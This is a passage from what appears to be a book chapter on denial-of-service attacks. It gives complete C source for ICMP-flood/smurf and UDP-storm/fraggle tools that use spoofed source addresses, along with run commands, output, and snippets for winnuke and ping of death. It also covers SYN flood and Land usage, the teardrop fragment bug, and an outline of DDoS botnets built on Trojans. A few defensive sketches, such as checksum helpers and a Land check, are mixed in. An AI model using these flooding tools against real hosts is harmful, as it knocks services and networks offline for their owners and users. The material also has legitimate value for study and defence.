icmp_hdr->icmp_id = 1;
icmp_hdr->icmp_seq = 1;
icmp_hdr->icmp_cksum = 0;
icmp_hdr->icmp_cksum = in_cksum((unsigned short *)icmp_hdr, sizeof(struct icmp) + 1400);

¹ Actually, sending fragmented packets does make some sense: Reassembling these packets will consume
resources of the victim's host in addition to exhausting the network resources. This, however, is of little
importance, especially when compared to an attack such as SYN flooding.

The protocol field (ip_hdr->protocol) of the IP header is filled with the IPPROTO_ICMP
constant (the value of 1), indicating that the given packet carries an ICMP message.

The checksum in both headers is calculated by the same in_cksum() function; only the values
passed to it differ for the two headers. (This question was considered in Section 3.6.)
As the RFCs require, the checksum field must be zeroed out before the checksum is calculated.
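To make the checksum rule concrete, here is a sketch that fills the checksum of a 20-byte IPv4 header using the in_cksum() algorithm of Listing 6.1. The names in_cksum_bytes() and set_ip_checksum() are hypothetical. The only changes to the algorithm are that words are loaded with memcpy(), so the buffer need not be aligned, and that an odd trailing byte is padded correctly on either byte order. The sample header is a commonly used textbook example whose checksum is 0xb861.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* The in_cksum() algorithm from Listing 6.1. Words are summed in host byte
   order; because one's complement addition does not depend on byte order
   (RFC 1071), storing the result back with memcpy() yields the correct
   bytes on both little- and big-endian machines. */
uint16_t in_cksum_bytes(const unsigned char *addr, size_t len)
{
    uint32_t sum = 0;
    uint16_t word;

    while (len > 1) {                      /* adding all 2-byte words */
        memcpy(&word, addr, 2);
        sum += word;
        addr += 2;
        len -= 2;
    }
    if (len == 1) {                        /* odd byte, padded with a zero byte */
        word = 0;
        memcpy(&word, addr, 1);
        sum += word;
    }
    sum = (sum >> 16) + (sum & 0xffff);    /* adding the carry */
    sum += (sum >> 16);                    /* adding the carry again */
    return (uint16_t)~sum;                 /* inverting the result */
}

/* Hypothetical helper: fill the checksum field (bytes 10-11) of a 20-byte
   IPv4 header whose other fields are already set. */
void set_ip_checksum(unsigned char *hdr)
{
    uint16_t c;

    hdr[10] = hdr[11] = 0;                 /* zero the field first */
    c = in_cksum_bytes(hdr, 20);
    memcpy(hdr + 10, &c, 2);               /* memory order, so no htons() */
}
```

Summing a header that already contains a correct checksum gives 0, which is how a receiver verifies it.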

As you can see, you can fill the source (ip_hdr->saddr) and destination (ip_hdr->daddr)
IP address fields yourself. Thus, you can put any IP address in the network byte order into
these fields, that is, perform IP spoofing. The user passes the addresses to the program on
the command line: the source address in the first argument, and the destination address in
the second. The resolve() function converts the addresses passed to the utility to IP addresses
in the network byte order. Entering the word "random" as the source host makes the program
fill the source IP address field with random values generated using the random() function.
Packets are sent in an endless loop.

According to man 7 raw, the checksum (ip_hdr->check), source address (ip_hdr->saddr),
packet identifier (ip_hdr->id), and total length (ip_hdr->tot_len) fields do not necessarily
have to be filled manually; the IP subsystem can do this for you. In the program, I fill
all of these fields to show how to do this the right way.

The checksum field in the ICMP header also does not have to be filled. If it is not, the packet
will be sent successfully, but the destination host will drop it as invalid. Although for a DoS
attack it generally does not matter whether the victim rejects or accepts a packet, the latter is
preferable, because in this case the victim sends echo replies to echo requests, thus flooding
the channel even more.

To check the operation of the utility, start the tcpdump utility in a separate terminal and 
observe packets being sent. Then compile the icmpflood utility and run it in the ICMP flood- 
ing mode, specifying that random source IP addresses should be used: 

# gcc icmpflood.c -o icmpflood 

# ./icmpflood random 192.168.10.1 




The output produced should look similar to this: 


06:20:52.842589 eth0 > 103.69.139.107 > 192.168.10.1: icmp: echo request
06:20:52.842589 eth0 > 198.35.123.50 > 192.168.10.1: icmp: echo request
06:20:52.842589 eth0 > 105.152.60.100 > 192.168.10.1: icmp: echo request
06:20:52.842589 eth0 > 115.72.51.102 > 192.168.10.1: icmp: echo request
06:20:52.842589 eth0 > 61.220.176.116 > 192.168.10.1: icmp: echo request
06:20:52.842589 eth0 > 255.92.73.25 > 192.168.10.1: icmp: echo request
06:20:52.842589 eth0 > 74.148.232.42 > 192.168.10.1: icmp: echo request
06:20:52.842589 eth0 > 236.988.85.98 > 192.168.10.1: icmp: echo request
06:20:52.842589 eth0 > 41.31.142.35 > 192.168.10.1: icmp: echo request


There are no replies from host 192.168.10.1 because it sends them to random addresses.
To carry out a smurf attack, run the utility as follows: 
# ./icmpflood 192.168.10.132 192.168.10.255 


Here, a broadcast echo request is sent to 192.168.10.255 from host 192.168.10.132. In response,
all computers in the 192.168.10.0 network will send echo replies to host 192.168.10.132.

The source for the utility is shown in Listing 6.1. It can also be found in the /PART II/ 
Chapter 6 directory on the accompanying CD-ROM. 





Listing 6.1. A utility for ICMP flooding and smurf attacks (icmpflood.c)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>

/*------------------------------------------------*/
/* Converting the host name into its IP address   */
/*------------------------------------------------*/
unsigned long resolve(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    return *(unsigned long *)hp->h_addr_list[0];
}

/*------------------------------------------------*/
/* Calculating the checksum                       */
/*------------------------------------------------*/
unsigned short in_cksum(unsigned short *addr, int len)
{
    unsigned short result;
    unsigned int sum = 0;

    /* Adding all 2-byte words */
    while (len > 1) {
        sum += *addr++;
        len -= 2;
    }

    /* If there is a byte left over, adding it to the sum */
    if (len == 1)
        sum += *(unsigned char*) addr;

    sum = (sum >> 16) + (sum & 0xFFFF);   /* Adding the carry */
    sum += (sum >> 16);                   /* Adding the carry again */
    result = ~sum;                        /* Inverting the result */
    return result;
}

/*------------------------------------------------*/
/* The main() function                            */
/*------------------------------------------------*/
int main(int argc, char *argv[])
{
    int sd;
    const int on = 1;
    int rnd = 0;
    unsigned long dstaddr, srcaddr;
    struct sockaddr_in servaddr;

    char sendbuf[sizeof(struct iphdr) + sizeof(struct icmp) + 1400];
    struct iphdr *ip_hdr = (struct iphdr *)sendbuf;
    struct icmp *icmp_hdr = (struct icmp *)(sendbuf + sizeof(struct iphdr));

    if (argc != 3) {
        fprintf(stderr,
                "Usage: %s <source address | random> <destination address>\n",
                argv[0]);
        exit(-1);
    }

    /* Creating a raw socket */
    if ((sd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("socket() failed");
        exit(-1);
    }

    /* Because the IP header will be filled in the program,
       set the IP_HDRINCL option. */
    if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
        perror("setsockopt() failed");
        exit(-1);
    }

    /* Enabling the broadcasting capability */
    if (setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on)) < 0) {
        perror("setsockopt() failed");
        exit(-1);
    }

    /* If the first argument is "random,"
       the source IP address is randomly selected. */
    if (!strcmp(argv[1], "random")) {
        rnd = 1;
        srcaddr = random();
    } else
        srcaddr = resolve(argv[1]);

    /* The victim's IP address */
    dstaddr = resolve(argv[2]);

    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = dstaddr;

    /* Filling the IP header */
    ip_hdr->ihl = 5;
    ip_hdr->version = 4;
    ip_hdr->tos = 0;
    ip_hdr->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmp) + 1400);
    ip_hdr->id = 0;
    ip_hdr->frag_off = 0;
    ip_hdr->ttl = 255;
    ip_hdr->protocol = IPPROTO_ICMP;
    ip_hdr->saddr = srcaddr;
    ip_hdr->daddr = dstaddr;
    /* The checksum is calculated last, over the completed header */
    ip_hdr->check = 0;
    ip_hdr->check = in_cksum((unsigned short *)ip_hdr, sizeof(struct iphdr));

    /* Filling the ICMP header */
    icmp_hdr->icmp_type = ICMP_ECHO;
    icmp_hdr->icmp_code = 0;
    icmp_hdr->icmp_id = 1;
    icmp_hdr->icmp_seq = 1;
    icmp_hdr->icmp_cksum = 0;
    icmp_hdr->icmp_cksum = in_cksum((unsigned short *)icmp_hdr,
                                    sizeof(struct icmp) + 1400);

    /* Sending packets in an endless loop */
    while (1) {
        if (sendto(sd,
                   sendbuf,
                   sizeof(sendbuf),
                   0,
                   (struct sockaddr *)&servaddr,
                   sizeof(servaddr)) < 0) {
            perror("sendto() failed");
            exit(-1);
        }

        /* Generating a new random source IP address
           if the first argument was "random" */
        if (rnd)
            ip_hdr->saddr = random();
    }

    return 0;
}
6.1.2. UDP Storm and Fraggle


The UDP storm attack is also called Chargen or Echo-Chargen because this attack makes use 
of these services. In response to a UDP request, the UDP service chargen (port 19) sends 
a packet of characters, and the UDP service echo (port 7) sends the arrived packet back. Thus, 
sending UDP packets from port 19 to port 7 starts an endless loop. This loop can be started 
both at a single host and between two remote hosts as long as the hosts are running the chargen 
and echo services. Not only port 7 but any other port that automatically answers any request 
can be used, for example, port 13 (daytime) or port 37 (time). 

Listing 6.2 shows the source code for a program for carrying out UDP storm and fraggle
attacks. A fraggle attack is similar to a smurf attack, but it uses UDP packets. The attacker 
sends UDP packets from a spoofed address to a broadcast address (usually to port 7, echo) of 
the intermediary broadcast machines, or amplifiers. Each machine of the network that is en- 
abled to answer echo request packets will do so, thus generating a huge amount of traffic hit- 
ting the target machine like a tsunami. 

This program is much the same as the icmpflood.c program (Listing 6.1), only here the UDP
header is filled instead of the ICMP header. Note that a pseudo header (see Section 3.6) is used
for calculating the checksum in the UDP header. Moreover, if the value returned from the
in_cksum() function is 0, it must be replaced with 0xffff, as required by RFC 768.
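A sketch of the UDP checksum with the pseudo header, written independently of Listing 6.2. The function name and the byte-array parameters are assumptions made to keep it self-contained. It builds the 12-byte pseudo header (source address, destination address, a zero byte, protocol 17, UDP length), sums it together with the UDP header and data, and applies the RFC 768 rule that a computed checksum of 0 is transmitted as 0xffff.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Add big-endian 16-bit words to a running one's complement sum */
static uint32_t sum16(const unsigned char *p, size_t len, uint32_t sum)
{
    while (len > 1) {
        sum += (uint32_t)((p[0] << 8) | p[1]);
        p += 2;
        len -= 2;
    }
    if (len == 1)
        sum += (uint32_t)p[0] << 8;           /* pad the odd byte with a zero */
    return sum;
}

/* Hypothetical helper. src and dst are IPv4 addresses as 4 bytes in network
   order; udp points at the UDP header (checksum field zeroed) followed by
   the data. Returns the checksum in host order; store it with htons(). */
uint16_t udp_checksum(const unsigned char src[4], const unsigned char dst[4],
                      const unsigned char *udp, size_t udplen)
{
    unsigned char pseudo[12];
    uint32_t sum;

    memcpy(pseudo, src, 4);                   /* source address */
    memcpy(pseudo + 4, dst, 4);               /* destination address */
    pseudo[8] = 0;                            /* place holder */
    pseudo[9] = 17;                           /* protocol: UDP */
    pseudo[10] = (unsigned char)(udplen >> 8);    /* UDP length */
    pseudo[11] = (unsigned char)(udplen & 0xff);

    sum = sum16(pseudo, sizeof pseudo, 0);
    sum = sum16(udp, udplen, sum);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);   /* fold the carries */
    sum = ~sum & 0xffff;
    return sum == 0 ? 0xffff : (uint16_t)sum; /* RFC 768: 0 is sent as all ones */
}
```

For instance, a header-only datagram from 192.168.10.1, port 19, to 192.168.10.130, port 7, has the checksum 0x69f0. The pseudo header is never transmitted; it only ties the checksum to the IP addresses, so a datagram delivered to the wrong host fails verification.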

Perhaps you have noticed that some header fields of network packets and some sockaddr
family structures are specified in the network byte order with the help of conversion functions
like htons() and inet_aton(), whereas other fields are specified in the host byte order.
Unfortunately, there is no general rule concerning this issue: Some fields must be specified in the
network byte order only, some can only be specified in the host byte order, and for some the
order does not matter. This raises a legitimate question: In what order must a specific field be
specified? The only pertinent information I have found on this question is in the
UNIX Network Programming book by Richard Stevens:

Theoretically, a UNIX implementation could store the fields of a socket address structure in
the host byte order and then do the necessary conversions when moving fields into protocol headers
and back, allowing us to not concern ourselves with this task. But historically and from the
Posix.1g perspective, some of the socket address structure fields must have the network byte order.

The only thing known for certain is that fields containing port numbers and IP addresses
must be specified in the network byte order. As for other fields, I determined their order
experimentally. Therefore, in programs in this and other chapters of the book, I use the htons(),
htonl(), inet_aton(), and other byte order conversion functions on network packet headers
and sockaddr family structures where I judge them to be most appropriate.
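A small sketch of this rule, using a hypothetical fill_sockaddr() helper: the port and the address go into a sockaddr_in in network byte order (through htons() and inet_aton()), while sin_family is a plain constant in host byte order.

```c
#include <stdint.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Hypothetical helper: fill a sockaddr_in the way the listings do.
   Returns 1 on success, 0 if ip is not a valid dotted-decimal address. */
int fill_sockaddr(struct sockaddr_in *sa, const char *ip, uint16_t port)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;              /* host byte order: a plain constant */
    sa->sin_port = htons(port);            /* network byte order */
    return inet_aton(ip, &sa->sin_addr);   /* stores the address in network order */
}
```

On a little-endian PC, sin_port for port 80 is stored as the bytes 0x00 0x50, the reverse of the native in-memory layout of the integer 80; ntohs() converts it back.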

In addition to the addresses, the source and destination ports must be passed to the 
udpstorm program in the command line — for example, as follows: 

# gcc udpstorm.c -o udpstorm

# ./udpstorm 192.168.10.1 19 192.168.10.130 7 

The source for the udpstorm program is shown in Listing 6.2. It can also be found in the 
/PART II/Chapter 6 directory on the accompanying CD-ROM. 
Listing 6.2. A utility for UDP storm and fraggle attacks (udpstorm.c)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>

/*------------------------------------------------*/
/* Converting the host name into its IP address   */
/*------------------------------------------------*/
unsigned long resolve(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    return *(unsigned long *)hp->h_addr_list[0];
}

/*------------------------------------------------*/
/* Calculating the checksum                       */
/*------------------------------------------------*/
unsigned short in_cksum(unsigned short *addr, int len)
{
    unsigned short result;
    unsigned int sum = 0;

    /* Adding all 2-byte words */
    while (len > 1) {
        sum += *addr++;
        len -= 2;
    }

    /* If there is a byte left over, adding it to the sum */
    if (len == 1)
        sum += *(unsigned char*) addr;

    sum = (sum >> 16) + (sum & 0xFFFF);   /* Adding the carry */
    sum += (sum >> 16);                   /* Adding the carry again */
    result = ~sum;                        /* Inverting the result */
    return result;
}

/*------------------------------------------------*/
/* The main() function                            */
/*------------------------------------------------*/
int main(int argc, char *argv[])
{
    int sd;
    const int on = 1;
    unsigned long dstaddr, srcaddr;
    int dport, sport;
    struct sockaddr_in servaddr;

    /* The pseudo header structure */
    struct pseudohdr {
        unsigned int source_address;
        unsigned int dest_address;
        unsigned char place_holder;
        unsigned char protocol;
        unsigned short length;
    } pseudo_hdr;

    char sendbuf[sizeof(struct iphdr) + sizeof(struct udphdr)];
    struct iphdr *ip_hdr = (struct iphdr *)sendbuf;
    struct udphdr *udp_hdr = (struct udphdr *)(sendbuf + sizeof(struct iphdr));
    unsigned char *pseudo_packet;   /* A pointer to the pseudo packet */

    if (argc != 5) {
        fprintf(stderr,
                "Usage: %s <source address> <source port> <destination address> <destination port>\n",
                argv[0]);
        exit(-1);
    }

    /* Creating a raw socket */
    if ((sd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        perror("socket() failed");
        exit(-1);
    }

    /* Because the IP header will be filled in the program,
       set the IP_HDRINCL option */
    if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
        perror("setsockopt() failed");
        exit(-1);
    }

    srcaddr = resolve(argv[1]);   /* The source IP address */
    sport = atoi(argv[2]);        /* The source port */
    dstaddr = resolve(argv[3]);   /* The victim's IP address */
    dport = atoi(argv[4]);        /* The victim's port */

    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(dport);
    servaddr.sin_addr.s_addr = dstaddr;

    /* Filling the IP header */
    ip_hdr->ihl = 5;
    ip_hdr->version = 4;
    ip_hdr->tos = 0;
    ip_hdr->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr));
    ip_hdr->id = 0;
    ip_hdr->frag_off = 0;
    ip_hdr->ttl = 255;
    ip_hdr->protocol = IPPROTO_UDP;
    ip_hdr->saddr = srcaddr;
    ip_hdr->daddr = dstaddr;
    /* The checksum is calculated last, over the completed header */
    ip_hdr->check = 0;
    ip_hdr->check = in_cksum((unsigned short *)ip_hdr, sizeof(struct iphdr));

    /* Filling the pseudo header */
    pseudo_hdr.source_address = srcaddr;
    pseudo_hdr.dest_address = dstaddr;
    pseudo_hdr.place_holder = 0;
    pseudo_hdr.protocol = IPPROTO_UDP;
    pseudo_hdr.length = htons(sizeof(struct udphdr));

    /* Filling the UDP header */
    udp_hdr->source = htons(sport);
    udp_hdr->dest = htons(dport);
    udp_hdr->len = htons(sizeof(struct udphdr));
    udp_hdr->check = 0;

    /* Allocating memory for formatting a pseudo packet */
    if ((pseudo_packet = (unsigned char *)malloc(sizeof(pseudo_hdr) +
                                                  sizeof(struct udphdr))) == NULL) {
        perror("malloc() failed");
        exit(-1);
    }

    /* Copying the pseudo header to the start of the pseudo packet */
    memcpy(pseudo_packet, &pseudo_hdr, sizeof(pseudo_hdr));

    /* Copying the UDP header */
    memcpy(pseudo_packet + sizeof(pseudo_hdr), sendbuf + sizeof(struct iphdr),
           sizeof(struct udphdr));

    /* Calculating the UDP header checksum */
    if ((udp_hdr->check = in_cksum((unsigned short *)pseudo_packet,
                                   sizeof(pseudo_hdr) + sizeof(struct udphdr))) == 0)
        udp_hdr->check = 0xffff;

    /* Sending packets in an endless loop */
    while (1) {
        if (sendto(sd,
                   sendbuf,
                   sizeof(sendbuf),
                   0,
                   (struct sockaddr *)&servaddr,
                   sizeof(servaddr)) < 0) {
            perror("sendto() failed");
            exit(-1);
        }
    }

    return 0;
}


6.2. Attacks That Exhaust Host Resources 


6.2.1. SYN Flooding and Land 


In a SYN flooding attack, the attacker tries to make the server exceed the number of
in-progress connections that can be kept open at the same time. When a server receives a TCP
packet with the SYN flag set at an open port, it replies with a SYN-ACK message and waits for an
ACK reply. While waiting for the ACK message, the server retains the half-open connection as
a new record in the TCP/IP stack. The server removes the corresponding record if it is
unable to finish establishing the connection within a certain period. This period varies from
tens of seconds to tens of minutes depending on the system. Because only a limited number of
half-open connections can be maintained in the queue, once this number is exceeded the
server rejects any further connection requests.
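The exhaustion mechanism can be illustrated with a toy model of the half-open connection queue. This sketch does not reflect how any real TCP/IP stack stores half-open connections: the queue size (3) and the timeout (75 seconds) are arbitrary assumptions, and on_syn() is a hypothetical function. It only shows that once every slot holds an unanswered SYN, new requests are rejected until an entry times out.

```c
#include <stddef.h>

#define BACKLOG_MAX 3        /* assumed queue size, for illustration only */
#define SYN_TIMEOUT 75       /* assumed lifetime of a half-open entry, in seconds */

/* Toy model of a listening socket's half-open connection queue */
struct half_open_queue {
    long expires[BACKLOG_MAX];   /* expiry time of each half-open entry */
    size_t count;                /* number of entries in use */
};

/* Drop entries whose timeout has passed */
static void purge_expired(struct half_open_queue *q, long now)
{
    size_t i = 0;

    while (i < q->count) {
        if (q->expires[i] <= now)
            q->expires[i] = q->expires[--q->count];  /* swap-remove the entry */
        else
            i++;
    }
}

/* A SYN arrives at time `now`. Returns 1 if a half-open entry is created
   (a real server would answer with SYN-ACK), or 0 if the queue is full and
   the connection request is rejected. */
int on_syn(struct half_open_queue *q, long now)
{
    purge_expired(q, now);
    if (q->count == BACKLOG_MAX)
        return 0;
    q->expires[q->count++] = now + SYN_TIMEOUT;
    return 1;
}
```

With these assumed values, three unanswered SYNs arriving at seconds 0, 1, and 2 fill the queue; a legitimate SYN at second 10 is rejected, and the next one is accepted only at second 75, when the first entry expires.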

The utility for carrying out a SYN attack is named synflood. I am not giving its source
code in the book; it can be found in the /PART II/Chapter 6 directory on the accompanying
CD-ROM. In many respects, this code is analogous to the source of the attacks from the
previous section, only here TCP packet fields are filled and sent. As when calculating the UDP
header checksum, a pseudo header is used for calculating the TCP header checksum (see
Section 3.6).

This utility can also be used to carry out a Land attack. A Land attack sends the attacked
host TCP packets with the SYN flag set and with the source IP address and port matching
those of the destination, for example, as follows:


# gcc synflood.c -o synflood
# ./synflood 192.168.10.1 80 192.168.10.1 80
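Because a Land packet is defined entirely by its header fields, a packet filter can recognize it with a single comparison. The sketch below is a hypothetical check: is_land_segment() is not part of any real firewall API. Addresses and ports can be passed in whatever byte order they were read from the header, since only equality matters.

```c
#include <stdint.h>

/* Hypothetical filter rule: a TCP segment is a Land packet when it carries
   SYN and its source address and port equal its destination address and
   port. Byte order is irrelevant because only equality is tested. */
int is_land_segment(uint32_t saddr, uint16_t sport,
                    uint32_t daddr, uint16_t dport, int syn_set)
{
    return syn_set && saddr == daddr && sport == dport;
}
```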
6.3. Attacks That Exploit Software Bugs


Software bugs that can crash a host or make it operate erratically occur often. Sometimes, such 
bugs are used by hackers in their DoS exploits (see Section 14.2). DoS exploits, however, as 
a rule crash only a single vulnerable application (e.g., a Web server), not the operating system. 
Bugs in operating systems or in their key components, such as the TCP/IP stack, are not as 
common as they were in the Windows 9x days. Bugs in the key components of that operating 
system were discovered one after another. A remote machine could be crashed or rebooted by 
sending it just a few bytes. At that time, every day was a field day for hackers. In this section, 
I consider vulnerabilities and utilities that are effective only on older operating systems. 
All experiments with these utilities were carried out on Windows 95, which I installed espe- 
cially for this purpose. 

You are probably wondering indignantly, Why should I waste my time learning obsolete 
vulnerabilities? It is important to know old vulnerabilities because history has a tendency to 
repeat itself. For example, many consumer appliances (refrigerators, microwave ovens, wash- 
ing machines, etc.) are now computerized and run under a mini operating system with 
a TCP/IP stack. It is logical, therefore, to expect the same errors to be made in those operating 
systems. Moreover, a modern operating system can harbor an old bug. For example, it would 
seem that the Land attack, considered in the previous section, became a thing of the past along 
with the obsolete operating systems it was developed for. However, quite recently a way of 
carrying out this attack against such modern operating systems as Windows Server 2003 and 
Windows XP Service Pack 2 was discovered. 


6.3.1. Out of Band 


In the out of band (OOB) attack, a TCP packet with the URG (urgent) flag set is sent to
a Windows machine with an open TCP port, which is usually port 139. Until Service Pack 3 was
released, this attack reliably crashed Windows NT and Windows 95 systems.

The source code for a utility implementing the OOB attack (winnuke.c) can be found in
the /PART II/Chapter 6 directory on the accompanying CD-ROM.

The key part of this program is the call that sends data with the MSG_OOB flag set
(out-of-band transmission):

char *str = "Crack";

send(sd, str, strlen(str), MSG_OOB);

According to the standard, only 1 byte of out-of-band data can be sent. Windows 95
developers relied on this requirement of the standard and overlooked the situation in which
more than 1 byte of such data arrives.


6.3.2. Teardrop 


The teardrop attack takes advantage of errors in the module responsible for assembling
fragmented IP packets. All received fragments are assembled in a loop; the data part
of the assembled packet is then copied to a buffer, which is then passed to the IP layer for
further processing.

At first glance, the developers did the right thing by implementing a check for fragments that
were too large. However, they overlooked the possibility of a fragment that was too small
being copied to the assembly buffer, that is, a fragment of a negative length.

Suppose that fragment X has the offset of 40 (the Fragment offset field in the IP header
equals 5) and the length of 200, and that fragment Y has the offset of 80 and the length of 300;
that is, the fragments overlap, which is allowed. The IP module calculates the part of fragment Y
that does not overlap fragment X as (80 + 300) - (40 + 200) = 140 and copies the last 140 bytes
of fragment Y to the assembly buffer. A hacker can build fragment Y so that it ends inside
fragment X, for example, with the offset of 80 and the length of 140. Calculating the
non-overlapping portion then gives a negative result: (80 + 140) - (40 + 200) = -20. Because of
the way negative numbers are represented in machine arithmetic, -20 stored in a 16-bit unsigned
length is interpreted as 65,516. The program starts writing 65,516 bytes into the assembly
buffer, overfills it, and overwrites the adjacent memory area as well.
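The arithmetic can be checked directly. The sketch below uses fragment X from the example (offset 40, length 200) and a fragment Y with offset 80 and length 140, which ends inside X. The function names are hypothetical. The unsigned short conversion models a 16-bit unsigned length variable, and safe_tail_length() shows the obvious defensive fix of clamping to zero.

```c
/* Length of the part of fragment Y that extends past the end of
   fragment X, computed as the text describes: end of Y minus end of X. */
int tail_length(int off_x, int len_x, int off_y, int len_y)
{
    return (off_y + len_y) - (off_x + len_x);
}

/* What a 16-bit unsigned length variable ends up holding
   (conversion is modulo 65,536). */
unsigned short as_u16(int n)
{
    return (unsigned short)n;
}

/* Defensive version: a fragment that ends inside an earlier one adds
   no new data, so the copy length is clamped to zero. */
int safe_tail_length(int off_x, int len_x, int off_y, int len_y)
{
    int n = tail_length(off_x, len_x, off_y, len_y);
    return n > 0 ? n : 0;
}
```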

Thus, in a teardrop attack, packets are constructed in the following way (a two-packet at- 
tack is considered): 


1. A packet that is supposed to be fragmented (the MF flag is set) is sent; the fragment
offset is 0 and the length of the data block is N.

2. The last fragment is sent (the MF flag is cleared); the fragment offset is a positive
number less than N, and the data block is short enough that the fragment ends inside the
first one (offset plus length is less than N).

3. Any source address is used for the packets, and they are sent to any port, regardless of
whether it is open or not.


There is another variety of the attack, called bonk. In this attack, holes are left in the 
packet after the fragments are assembled, which can also cause malfunctioning of the operat- 
ing system's kernel and hanging of the computer. 

All versions of Windows 95/NT up to Service Pack 4 and early Linux versions (e.g., 
Linux 2.0.0) had both of these vulnerabilities. 

The source codes for teardrop.c and bonk.c can be found in the /PART II/Chapter 6 direc- 
tory on the accompanying CD-ROM. 


6.3.3. Ping of Death 


The total packet length field of the IP packet header is of the unsigned short type (see
Section 3.4.2); accordingly, it cannot hold values greater than 65,535. Therefore, the maximum
length of the entire IP packet can be no more than 65,535 bytes. Because the IP header takes
from 20 to 60 bytes, the maximum amount of useful data that can be sent in one IP packet is
65,535 - 20 = 65,515 bytes.

In a ping of death attack, a hacker sends a fragmented ICMP packet that when assembled 
is larger than the maximum allowed IP-packet size. Some older operating systems did not 
know how to handle this situation and crashed. 
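The size check that those systems lacked takes only a few lines. Each fragment's end position is its header length, plus the Fragment Offset field times 8, plus its data length. That sum must not exceed 65,535. Suppose each fragment is 1,500 bytes (an assumption, since the buffer size is not shown in Listing 6.3). Then offsets advance in 1,480-byte steps and the last fragment starts at byte 65,120. With 398 data bytes (418 bytes minus the 20-byte header), that fragment pushes the datagram to 65,538 bytes, the total named in the listing's comment. The function name below is hypothetical.

```c
/* Returns 1 if a fragment would make the reassembled datagram exceed
   the 65,535-byte limit of the Total Length field, 0 otherwise.
   hdr_len  - IP header length in bytes (20 to 60)
   frag_off - raw 13-bit Fragment Offset field, in 8-byte units
   data_len - number of data bytes carried by the fragment */
int exceeds_ip_max(unsigned hdr_len, unsigned frag_off, unsigned data_len)
{
    unsigned long end = (unsigned long)hdr_len
                      + (unsigned long)frag_off * 8UL
                      + data_len;
    return end > 65535UL;
}
```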
The source code for a utility implementing this attack (win95ping.c) can be found in the
/PART II/Chapter 6 directory on the accompanying CD-ROM. 
The key part of this program is the portion that fragments the sent packet (Listing 6.3). 


Listing 6.3. Fragmenting an ICMP packet in the ping of death attack


icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = htons(~(ICMP_ECHO << 8));

for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
    ip->ip_off = FIX(offset >> 3);
    if (offset < 65120)
        ip->ip_off |= FIX(IP_MF);
    else
        ip->ip_len = FIX(418);  /* Make total 65,538 */
    if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
               sizeof dst) < 0) {
        fprintf(stderr, "offset %d: ", offset);
        perror("sendto");
    }
}

When I tried this attack against Windows 95, the latter continued operating as usual.
At first, I thought that this was because the win95ping.c program does not calculate the
checksum in each of the fragments. I rewrote the program to calculate the checksum, but this did
not produce the desired results. Then I happened across some information from Russian
computer experts I. D. Medvedskiy, P. V. Semianov, and L. G. Leonov and learned that I was not
the only one having problems getting the attack to work. Here is what they say about the ping of
death attack:

We started our testing and, frankly, were not surprised at all when the operating systems
under investigation (IRIX, AIX, VMS, SunOS, FreeBSD, Linux, Windows NT 4.0, and even
Windows 95 and Windows for WorkGroups 3.11) did not react at all to this type of incorrect request
and continued normal operation. Then we started looking specifically for an operating system that
this attack could affect. Such a system turned out to be Windows 3.11 with WinQVT: It did hang.
Based on our experiments, it can be concluded that the fears of this attack are not based on any 
actual grounds and it is just another programmer myth and should be placed into the category of 
being practically unfeasible. 

Thus, the destructive effects of the ping of death attack have been greatly exaggerated. 


6.4. Distributed DoS 


This book would be incomplete if it did not include a description of utilities for carrying out
distributed DoS (DDoS) attacks. The first large-scale DDoS attacks to draw worldwide attention
were carried out in February 2000; for several days, they disrupted the operation of many
well-known sites: Yahoo, eBay, Amazon, ZDNet, Buy.com, CNN, and many others.
Although I had a burning desire to describe a programming implementation of a DDoS
utility, my better judgment prevailed and I decided to limit the information to only a general
description of such a utility. However, these utilities are nothing conceptually new: They are
just a combination of backdoor or Trojan technology and simple DoS utilities, such as those
considered in this chapter. Therefore, after reading this book you should have no problems
constructing such a utility on your own; just be aware of the consequences of taking it public.

The main difference between a distributed and a nondistributed DoS attack is that a DDoS 
attack is carried out not from a single host, as a nondistributed DoS attack is, but from multi- 
ple hosts simultaneously. Therefore, a DDoS utility consists of two components: a client and 
a server. The server part is a daemon (or a service, in Windows parlance) that executes the 
commands sent to it by the client part. The exact nature of the commands depends on the 
utility's developer, but practically all utilities of this kind offer commands to select the attack 
type (ICMP flooding, smurf, SYN flooding, etc.), commence an attack, and stop the attack. 

The perpetrator needs to install the server part on as many machines as possible. It is not
necessary to break into each machine; the installation can be done using Trojan programs.
A machine with a Trojan installed is called a zombie or bot.

The usual telnet or netcat utilities can be used as the simplest client. 

The client part can connect to the zombie in different ways. The most common way is for
each successfully installed Trojan to open a port and inform the hacker of the zombie machine's
IP address (e.g., by sending an email). The hacker uses the client part to connect to all
of the zombies and issue them commands. This method, however, is inefficient because the
